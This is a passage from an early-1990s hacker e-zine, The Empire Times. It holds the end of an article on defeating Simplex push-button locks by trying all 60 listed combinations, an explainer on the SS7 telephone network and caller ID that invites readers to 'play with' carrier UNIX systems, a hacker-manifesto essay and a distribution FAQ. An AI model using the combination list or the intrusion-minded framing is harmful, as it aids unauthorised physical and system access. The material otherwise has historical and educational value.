  1639.         a few of these simplex locks and I couldnt find a file that tells
  1640.         how to actually "hack" it if you dont know the code.  Since I had
  1641.         to do it myself and couldnt find it anywhere, I thought I'd write
  1642.         about it. So what you basically do is either memorize the pattern
  1643.         and then start to manually hack it, or if you arnt a thinker, you
  1644.         can get a mini-cassette  recorder & record your voice saying them
  1645.         one by one, manually enter them as you play the tape back and you
  1646.         wont miss a combination. (This method is not as time consuming as
  1647.         you think if you can enter them fast.)
  1648.         I hope you can benifit from this text file, Simplex locks are fun
  1649.  
  1650.                                          erudite
  1651.  
  1652.                         Here are all 60 combinations:
  1653.  
  1654.                        123    213    312    412    512
  1655.                        124    214    314    413    513
  1656.                        125    215    315    415    514
  1657.                        132    231    321    421    521
  1658.                        134    234    324    423    523
  1659.                        135    235    325    425    524
  1660.                        142    241    341    431    531
  1661.                        143    243    342    432    532
  1662.                        145    245    345    435    534
  1663.                        152    251    351    451    541
  1664.                        153    253    352    452    542
  1665.                        154    254    354    453    543
  1666.  
  1667. ==============================================================================
  1668.  
  1669.                           -=- The Empire Times -=-
  1670.                        Volume 2, Issue 4, File 7 of 8
  1671.                    SS7 and caller ID and stuff like that.
  1672.                                 by grendal
  1673.  
  1674.      I keep reading things that talk about caller ID and ANI and SS7.  EXCEPT
  1675. that pieces of the puzzle are always missing.  I decided to try clear these
  1676. up a little:
  1677.  
  1678.       SS7 is really a complex packet network that links AT&T UNIX processors
  1679. (the ones that run AT&T toll offices and Bell Operating company central
  1680. offices) with a series of other UNIX routing processors called STPs (Signal
  1681. Transfer Points) and SCPs (service control points).  STP's are really I/O and
  1682. communications processors while SCP's are high speed database servers for the
  1683. STPs. The SCPs are responsible for synchronizing information about numbering
  1684. plans, switching offices, call setups and routing (paths) and call accounting.
  1685. Each SS7 end point (telephone switch) has a unique PC or Point Code so routing
  1686. is easy.
  1687.  
  1688.       SS7 is a CCITT specification and the messages used by it as well as the
  1689. structure of the network are public information.  AT&T started SS7 in 1976
  1690. when it was known as CCIS or "common channel interoffice signalling".  Today
  1691. AT&T, MCI and Sprint all use SS7, but many LECs (local exchange carriers)
  1692. don't participate.  Most likely this is because they would have to convert
  1693. their switching equipment which would cost big bucks which they would rather
  1694. spend on executive salaries.
  1695.  
  1696.       In the "good ol days", each switch that received a call had to choose
  1697. a path through the office either to a line or to a trunk to another office.
  1698. It had to receive and send call digits and call progress signals.  Since SS7,
  1699. the UNIX machines that control the individual physical AT&T toll offices are
  1700. NO LONGER IN CONTROL OF SELECTING THE CALL PATH THROUGH THE OFFICE!  Hence
  1701. the major crashes that happen when the system goes down because one node goes
  1702. down or a bug hits them all. The SS7 packet network is currently being
  1703. converted to T1 (1.544mb/s) connections, but lots of it is still running on
  1704. 56kb/s links - digital private lines that are hooked up between the UNIX
  1705. processors.
  1706.  
  1707. This network is a system of "links";
  1708. "A" links connect telephone switches or data bases to STP processors.
  1709. "B" links connect STP pairs in different areas of the country or regions.
  1710. "C" links connect mated STP pairs (STP's are duplicated to prevent failures).
  1711. "D" links interconnect different SS7 networks such as AT&T's and MCI's.
  1712. "E" links connect a telephone switch to an STP in a different region.
  1713. "F" links connect telephone switches to other telephone switches.
  1714.     (this is called associated signalling)
  1715.  
  1716.       Since LECs and IXC's are greedy and since extortion is their business,
  1717. they don't cooperate very well and LEC SS7 networks only talk to IXC
  1718. (interexchange carrier) networks like AT&T, MCI and Sprint 'cause the law says
  1719. they have to.  ANI (automatic number identification) over SS7 only goes
  1720. forward from the LEC to the IXC when a call leaves a LATA.  The IXC doesn't
  1721. deliver it to the distant end LEC.
  1722.  
  1723.       The IXCs are therefore the only ones who can provide nation (or world)
  1724. wide calling party ID and then only if your equipment (PBX) is connected
  1725. directly to their networks. This is why caller ID is anly available within
  1726. LEC areas and even then it may not be able to cross two switching offices
  1727. since the LEC's don't often build "F" links among their own switching systems'
  1728. computers.
  1729.  
  1730.       This is often because the software releases of the switching controllers
  1731. aren't SS7 compatible.  For example, 1ESS needs generic 1AE10, 5ESS needs
  1732. 5E4.2 and DMS100 (the most popular Northern Tel switch) needs BCS25.  The
  1733. message routing STPs are most often AT&T 2ASTP's, DSC DEX Megahub (MCI) and
  1734. NTI SuperNodes.  Of course the software on each of these systems is unfriendly
  1735. to the others....
  1736.  
  1737.       All of this leaves a whole world of UNIX computers out there for us to
  1738. play with.  The more the merrier....  In the future, I'll try to find some
  1739. database structure information about the STPs and SCPs and if anyone wants
  1740. more detail, leave a note on Digital Anarchy.
  1741.  
  1742.       The BAD part about it all is that there is no longer much room for
  1743. "anonymous" telephone calls.  The Telco's and the Federales can see almost
  1744. all of your connections and identify both you and the other end.  If they can
  1745. do that, obviously they can also listen to your data and your voice.  This is
  1746. why we need to work really hard on systems like encryption and tempnets or
  1747. pseudopacket nets to keep our privacy and anonymity.
  1748.  
  1749.       Leave some notes and let me know what (besides the obvious shit like
  1750. accounts and numbers and id's and passwords) you need to know. I'll try and
  1751. cover it and keep these short and useful, maybe with a 2 week interval.  The
  1752. next issue will look at AUDIX - the most common voice mailbox system used for
  1753. AT&T's PBX's.
  1754.  
  1755.                                          later,
  1756.  
  1757.                                             grendal
  1758.  
  1759.  
  1760. ==============================================================================
  1761.  
  1762.                           -=- The Empire Times -=-
  1763.                        Volume 2, Issue 4, File 8 of 8
  1764.                            Don't tell me our name,
  1765.                                  by erudite
  1766.  
  1767.         Have you ever wondered why?  Have you ever wondered how?  I bet you
  1768. wished you had, or tried.  I do, I think, I wonder, I explore, I live to see
  1769. the day you come forth to me and ask me for advice.  While now you turn your
  1770. nose up at the sight of my name, our name..
  1771.         You take me as a man in black, but I won't let that stop me from
  1772. stating my point.  You fear me, you loth me at the site of my name, our name..
  1773.         If you could take me as a individual, or a person you would respect
  1774. me, when you know my will is good.  When you know I'll advance the world...
  1775.         There again goes another lifeless kid playing on the computer, who
  1776. will one day make good money, no spouse, no where..  "He sits there and tries
  1777. to figu
  1778. re out how the machine works, he's probably just wasting he's time."
  1779. Maybe, maybe.. That's me, I want to know how it works, I want to know how
  1780. I can get into it.  "Damn Hacker, all he wants to do is put a virus or
  1781. something in there, wreck the computer, damn kid, he has no fear."
  1782.         Did you know the difference? I still to this day have yet to meet a
  1783. true hacker who's intentions are malicious, since one who is, is not a hacker.
  1784.         I won't let you try to kill my thought processes to try to tell me
  1785. I'm a threat to this world, when infact you who doesn't think is the real
  1786. threat.  Can you imagine a world without hackers now, a whole world with no
  1787. guidelines, going nowhere..
  1788.         So tell me I lie, tell me I cheat.  Make your excuses to explain your
  1789. mistakes.  Society's mistakes, Society's whisper...
  1790.         Change our name, and think not what society's thrown upon us, and
  1791. what we are..  You know they say "If you teach the what to think, they will
  1792. b0ecome the slave of knowledge, If you teach the how to think, knowledge will
  1793. become their slave."  Think things up not how you are imposed on, what you've
  1794. heard..  Think things up from what you've found, what you've discovered, and
  1795. you'll look upon us in a without the mask.
  1796.         Never again shall you look about me as if I'm the suspect, as if I'm
  1797. I'm the felon.  Open your mind, and soak in the knowledge like a sponge
  1798. submerged into the ocean.  You hate my erudition, but that is fine by me.
  1799. I've gone through my share of hardships, oh yes but I won't let that stop me
  1800. from stating my point..
  1801.  
  1802.  
  1803. ==============================================================================
  1804.  
  1805.   The Empire Times Q & A Section.
  1806.  
  1807. Where can I get The Empire Times?
  1808.  
  1809.   [NPA] [#]             [System Name]          [System Operator]
  1810.   ----- -------------   -------------------    -----------------
  1811.   (301) 384-2482        Empire                 Albatross
  1812.   (703) PRIVATE         Digital Anarchy        Armitage
  1813.   (+49) XXXXXXXXX       Secret Techtonics      Sevenup
  1814.  
  1815.   Via Anonymous FTP
  1816.  
  1817.    etext.archive.umich.edu    /pub/Zines/Emptimes
  1818.  
  1819. Where can I send my Article Submissions?
  1820.  
  1821.   You can mail Armitage or Albatross on either Digital Anarchy or
  1822.   Empire.  You can also mail them to me personally at armitage@dhp.com.
  1823.  
  1824. What kind of Files do we publish?
  1825.  
  1826.   We publish anything dealing with tellecommunications and or unix
  1827.   security (or lack thereof).  Or anything interesting and or informative.
  1828.  
  1829. Can I become a member board?
  1830.  
  1831.   Well, probably not.  If you wish to distribute Empire Times you may
  1832.   as long as the file is distributed in it's full entirety.
  1833.   There are no "Empire Times Distribution Sites", the three listed
  1834.   above, are those are run by Armitage, Albatross, and Sevenup and just
  1835.   tell where you can get the Empire Times.  You see, obviously you can
  1836.   get the Empire Times on Empire BBS and Armitage's BBS.. etc..
  1837.